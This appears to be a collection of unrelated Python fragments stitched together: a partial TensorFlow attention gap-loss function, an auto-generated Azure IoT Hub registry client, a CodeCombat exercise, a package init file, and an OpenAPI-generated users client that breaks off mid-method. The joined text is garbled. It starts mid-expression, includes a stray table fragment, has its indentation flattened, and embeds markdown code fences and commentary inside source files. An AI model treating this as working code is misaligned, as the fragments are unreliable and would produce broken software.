tf.ones_like(one_hot_sentence_labels) - one_hot_sentence_labels)
"""
heads_correct = tf.where(
tf.equal(tf.cast(tokens_non_default_head, tf.int32), 0),
tokens_default_head,
tokens_non_default_head)
heads_incorrect = tf.where(
tf.equal(tf.cast(tokens_default_head, tf.int32), 0),
tokens_default_head,
tokens_non_default_head)
"""
if type_distance == "distance_only":
# loss = max(0.0, threshold - |default - non_default|).
gap_loss = tf.math.maximum(
0.0,
tf.math.subtract(
minimum_gap_distance,
tf.math.abs(tf.subtract(
tokens_default_head_incorrect,
tokens_non_default_head_incorrect))))
elif type_distance == "contrastive":
squared_euclidean_distance = tf.reduce_sum(
tf.square(heads_correct - heads_incorrect))
# loss = (1 - y) * dist + y * max(0.0, threshold - dist).
gap_loss = tf.add(
tf.multiply(tf.ones_like(y_heads) - y_heads,
squared_euclidean_distance),
tf.multiply(y_heads,
tf.maximum(0.0,
minimum_gap_distance - squared_euclidean_distance)))
else:
# loss =
# [exp(max(0.0, threshold - |correct - incorrect|))
# * (1.0 + max(correct, incorrect) - correct)
# * (1.0 + incorrect - min(correct, incorrect))] - 1.0
gap_loss = tf.subtract(
tf.math.exp(tf.math.maximum(
0.0, minimum_gap_distance - tf.math.abs(heads_correct - heads_incorrect)))
* tf.add(1.0, tf.math.maximum(heads_correct, heads_incorrect) - heads_correct)
* tf.add(1.0, heads_incorrect - tf.math.minimum(heads_correct, heads_incorrect)),
1.0)
else:
raise ValueError(
"You have different number of token labels (%d) and "
"sentence labels (%d, which is non-binary). "
"We don't support attention loss for such a case!"
% (num_tok_labels, num_sent_labels))
return gap_loss
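# The `distance_only` branch is a plain hinge on the gap between the
# default-head and non-default-head scores. A standalone NumPy sketch
# (the scores and margin below are illustrative):

```python
import numpy as np

def gap_distance_only(default_scores, non_default_scores, margin=0.5):
    # Hinge loss: zero once the |default - non_default| gap is at
    # least `margin`, linear penalty when the gap is narrower.
    return np.maximum(0.0, margin - np.abs(default_scores - non_default_scores))

default_scores = np.array([0.9, 0.6])
non_default_scores = np.array([0.1, 0.5])
gap_loss = gap_distance_only(default_scores, non_default_scores)
# Gaps are 0.8 and 0.1, so only the second example is penalized.
```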
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from .. import models
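# Several operations below (delete_device, delete_module) rely on
# If-Match/ETag optimistic concurrency. The header semantics can be
# sketched with a small standalone helper (hypothetical, not part of
# the generated client):

```python
def if_match_header(etag=None, force=False):
    # Optimistic concurrency as described in the delete docstrings:
    # send the stored ETag so the service acts only if the identity is
    # unchanged; the wildcard '*' forces an unconditional operation.
    if force:
        return {'If-Match': '*'}
    if etag is None:
        raise ValueError("An ETag is required unless force=True.")
    return {'If-Match': etag}
```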
class RegistryManagerOperations(object):
"""RegistryManagerOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Version of the Api. Constant value: "2019-10-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2019-10-01"
self.config = config
def get_device_statistics(
self, custom_headers=None, raw=False, **operation_config):
"""Retrieves statistics about device identities in the IoT hub’s identity
registry.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: RegistryStatistics or ClientRawResponse if raw=true
:rtype: ~service.models.RegistryStatistics or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_device_statistics.metadata['url']
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RegistryStatistics', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_device_statistics.metadata = {'url': '/statistics/devices'}
def get_service_statistics(
self, custom_headers=None, raw=False, **operation_config):
"""Retrieves service statistics for this IoT hub’s identity registry.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ServiceStatistics or ClientRawResponse if raw=true
:rtype: ~service.models.ServiceStatistics or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_service_statistics.metadata['url']
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ServiceStatistics', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_service_statistics.metadata = {'url': '/statistics/service'}
def get_devices(
self, top=None, custom_headers=None, raw=False, **operation_config):
"""Get the identities of multiple devices from the IoT hub identity
registry. Not recommended. Use the IoT Hub query language to retrieve
device twin and device identity information. See
https://docs.microsoft.com/en-us/rest/api/iothub/service/queryiothub
and
https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-devguide-query-language
for more information.
:param top: This parameter, when specified, defines the maximum number
of device identities that are returned. Any value outside the range of
1-1000 is considered to be 1000.
:type top: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~service.models.Device] or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_devices.metadata['url']
# Construct parameters
query_parameters = {}
if top is not None:
query_parameters['top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Device]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_devices.metadata = {'url': '/devices'}
def bulk_device_crud(
self, devices, custom_headers=None, raw=False, **operation_config):
"""Create, update, or delete the identities of multiple devices from the
IoT hub identity registry.
Create, update, or delete the identities of multiple devices from the
IoT hub identity registry. A device identity can be specified only once
in the list. Different operations (create, update, delete) on different
devices are allowed. A maximum of 100 devices can be specified per
invocation. For large-scale operations, consider using the import
feature with blob storage
(https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-identity-registry#import-and-export-device-identities).
:param devices:
:type devices: list[~service.models.ExportImportDevice]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: BulkRegistryOperationResult or ClientRawResponse if raw=true
:rtype: ~service.models.BulkRegistryOperationResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.bulk_device_crud.metadata['url']
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(devices, '[ExportImportDevice]')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 400]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('BulkRegistryOperationResult', response)
if response.status_code == 400:
deserialized = self._deserialize('BulkRegistryOperationResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
bulk_device_crud.metadata = {'url': '/devices'}
def query_iot_hub(
self, query=None, x_ms_continuation=None, x_ms_max_item_count=None, custom_headers=None, raw=False, **operation_config):
"""Query an IoT hub to retrieve information regarding device twins using a
SQL-like language.
Query an IoT hub to retrieve information regarding device twins using a
SQL-like language. See
https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-query-language
for more information. Pagination of results is supported. This returns
information about device twins only.
:param x_ms_continuation:
:type x_ms_continuation: str
:param x_ms_max_item_count:
:type x_ms_max_item_count: str
:param query: The query.
:type query: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~service.models.Twin] or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
query_specification = models.QuerySpecification(query=query)
# Construct URL
url = self.query_iot_hub.metadata['url']
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if x_ms_continuation is not None:
header_parameters['x-ms-continuation'] = self._serialize.header("x_ms_continuation", x_ms_continuation, 'str')
if x_ms_max_item_count is not None:
header_parameters['x-ms-max-item-count'] = self._serialize.header("x_ms_max_item_count", x_ms_max_item_count, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(query_specification, 'QuerySpecification')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
# @digimaun - custom work, cut the fluff
return ClientRawResponse(None, response)
query_iot_hub.metadata = {'url': '/devices/query'}
def get_device(
self, id, custom_headers=None, raw=False, **operation_config):
"""Retrieve a device from the identity registry of an IoT hub.
Retrieve a device from the identity registry of an IoT hub.
:param id: Device ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Device or ClientRawResponse if raw=true
:rtype: ~service.models.Device or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_device.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Device', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_device.metadata = {'url': '/devices/{id}'}
def create_or_update_device(
self, id, device, if_match=None, custom_headers=None, raw=False, **operation_config):
"""Create or update the identity of a device in the identity registry of
an IoT hub.
Create or update the identity of a device in the identity registry of
an IoT hub. An ETag must not be specified for the create operation. An
ETag must be specified for the update operation. Note that generationId
and deviceId cannot be updated by the user.
:param id: Device ID.
:type id: str
:param device:
:type device: ~service.models.Device
:param if_match:
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Device or ClientRawResponse if raw=true
:rtype: ~service.models.Device or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.create_or_update_device.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(device, 'Device')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Device', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update_device.metadata = {'url': '/devices/{id}'}
def delete_device(
self, id, if_match=None, custom_headers=None, raw=False, **operation_config):
"""Delete the identity of a device from the identity registry of an IoT
hub.
Delete the identity of a device from the identity registry of an IoT
hub. This request requires the If-Match header. The client may specify
the ETag for the device identity on the request in order to compare to
the ETag maintained by the service for the purpose of optimistic
concurrency. The delete operation is performed only if the ETag sent by
the client matches the value maintained by the server, indicating that
the device identity has not been modified since it was retrieved by the
client. To force an unconditional delete, set If-Match to the wildcard
character (*).
:param id: Device ID.
:type id: str
:param if_match:
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.delete_device.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_device.metadata = {'url': '/devices/{id}'}
def purge_command_queue(
self, id, custom_headers=None, raw=False, **operation_config):
"""Deletes all the pending commands for this device from the IoT hub.
Deletes all the pending commands for this device from the IoT hub.
:param id: Device ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: PurgeMessageQueueResult or ClientRawResponse if raw=true
:rtype: ~service.models.PurgeMessageQueueResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.purge_command_queue.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PurgeMessageQueueResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
purge_command_queue.metadata = {'url': '/devices/{id}/commands'}
def get_modules_on_device(
self, id, custom_headers=None, raw=False, **operation_config):
"""Retrieve all the module identities on the device.
:param id: Device ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~service.models.Module] or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_modules_on_device.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Module]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_modules_on_device.metadata = {'url': '/devices/{id}/modules'}
def get_module(
self, id, mid, custom_headers=None, raw=False, **operation_config):
"""Retrieve the specified module identity on the device.
:param id: Device ID.
:type id: str
:param mid: Module ID.
:type mid: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Module or ClientRawResponse if raw=true
:rtype: ~service.models.Module or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_module.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
'mid': self._serialize.url("mid", mid, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Module', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_module.metadata = {'url': '/devices/{id}/modules/{mid}'}
def create_or_update_module(
self, id, mid, module, if_match=None, custom_headers=None, raw=False, **operation_config):
"""Create or update the module identity for device in IoT hub. An ETag
must not be specified for the create operation. An ETag must be
specified for the update operation. Note that moduleId and generationId
cannot be updated by the user.
:param id: Device ID.
:type id: str
:param mid: Module ID.
:type mid: str
:param module:
:type module: ~service.models.Module
:param if_match:
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Module or ClientRawResponse if raw=true
:rtype: ~service.models.Module or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.create_or_update_module.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
'mid': self._serialize.url("mid", mid, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(module, 'Module')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Module', response)
if response.status_code == 201:
deserialized = self._deserialize('Module', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update_module.metadata = {'url': '/devices/{id}/modules/{mid}'}
def delete_module(
self, id, mid, if_match=None, custom_headers=None, raw=False, **operation_config):
"""Delete the module identity for device of an IoT hub. This request
requires the If-Match header. The client may specify the ETag for the
device identity on the request in order to compare to the ETag
maintained by the service for the purpose of optimistic concurrency.
The delete operation is performed only if the ETag sent by the client
matches the value maintained by the server, indicating that the device
identity has not been modified since it was retrieved by the client. To
force an unconditional delete, set If-Match to the wildcard character
(*).
:param id: Device ID.
:type id: str
:param mid: Module ID.
:type mid: str
:param if_match:
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.delete_module.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
'mid': self._serialize.url("mid", mid, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_module.metadata = {'url': '/devices/{id}/modules/{mid}'}
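The optimistic-concurrency rule that `delete_module` documents (delete only when the client's ETag matches the server's, with `*` forcing an unconditional delete) can be sketched with a toy in-memory registry. Everything here is illustrative — `ModuleRegistry` and `PreconditionFailed` are not part of the SDK:

```python
class PreconditionFailed(Exception):
    """Raised when the client's If-Match ETag does not match the server's."""


class ModuleRegistry:
    """Toy in-memory stand-in for the service-side module identity store."""

    def __init__(self):
        self._modules = {}  # (device_id, module_id) -> current ETag

    def put(self, device_id, module_id, etag):
        self._modules[(device_id, module_id)] = etag

    def delete(self, device_id, module_id, if_match):
        current = self._modules.get((device_id, module_id))
        # '*' forces an unconditional delete; any other value must match the
        # ETag the server currently holds for this identity.
        if if_match != '*' and if_match != current:
            raise PreconditionFailed(
                f"ETag {if_match!r} does not match server ETag {current!r}")
        del self._modules[(device_id, module_id)]


registry = ModuleRegistry()
registry.put('device1', 'moduleA', etag='"v1"')
try:
    registry.delete('device1', 'moduleA', if_match='"stale"')
except PreconditionFailed:
    pass  # delete rejected: the identity changed since the client fetched it
registry.delete('device1', 'moduleA', if_match='*')  # wildcard always succeeds
```

A stale ETag maps to the service's precondition-failed response; the real client surfaces it as a `CloudError` rather than this hypothetical exception.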
# File: 4_Backwoods_Forest/103-Burls_Beets_Booleans/burls.py (repo: katitek/Code-Combat, MIT license)
hero.say(False)
hero.say(True)
hero.say(False)
hero.say(True)
hero.say(True)
# File: gym_cryptotrading/spaces/__init__.py (repo: datafields-team/gym-cryptotrading, MIT license)
from gym_cryptotrading.spaces.action import ActionSpace
from gym_cryptotrading.spaces.observation import ObservationSpace
# File: openapi_client/api/users_api.py (repo: osuka/dognews-scraper, MIT license)
"""
    Dognews Server API

    Dognews Server client API  # noqa: E501

    The version of the OpenAPI document: 1.0.0
    Generated by: https://openapi-generator.tech
"""


import re  # noqa: F401
import sys  # noqa: F401

from openapi_client.api_client import ApiClient, Endpoint as _Endpoint
from openapi_client.model_utils import (  # noqa: F401
    check_allowed_values,
    check_validations,
    date,
    datetime,
    file_type,
    none_type,
    validate_and_convert_types
)
from openapi_client.model.paginated_user_list import PaginatedUserList
from openapi_client.model.patched_user import PatchedUser
from openapi_client.model.user import User


class UsersApi(object):
    """NOTE: This class is auto generated by OpenAPI Generator
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    def __init__(self, api_client=None):
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client
        def __users_create(
            self,
            user,
            **kwargs
        ):
            """users_create  # noqa: E501

            **Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.*  # noqa: E501
            This method makes a synchronous HTTP request by default. To make an
            asynchronous HTTP request, please pass async_req=True

            >>> thread = api.users_create(user, async_req=True)
            >>> result = thread.get()

            Args:
                user (User):

            Keyword Args:
                _return_http_data_only (bool): response data without head status
                    code and headers. Default is True.
                _preload_content (bool): if False, the urllib3.HTTPResponse object
                    will be returned without reading/decoding response data.
                    Default is True.
                _request_timeout (int/float/tuple): timeout setting for this request. If
                    one number provided, it will be total request timeout. It can also
                    be a pair (tuple) of (connection, read) timeouts.
                    Default is None.
                _check_input_type (bool): specifies if type checking
                    should be done one the data sent to the server.
                    Default is True.
                _check_return_type (bool): specifies if type checking
                    should be done one the data received from the server.
                    Default is True.
                _host_index (int/None): specifies the index of the server
                    that we want to use.
                    Default is read from the configuration.
                async_req (bool): execute request asynchronously

            Returns:
                User
                    If the method is called asynchronously, returns the request
                    thread.
            """
            kwargs['async_req'] = kwargs.get(
                'async_req', False
            )
            kwargs['_return_http_data_only'] = kwargs.get(
                '_return_http_data_only', True
            )
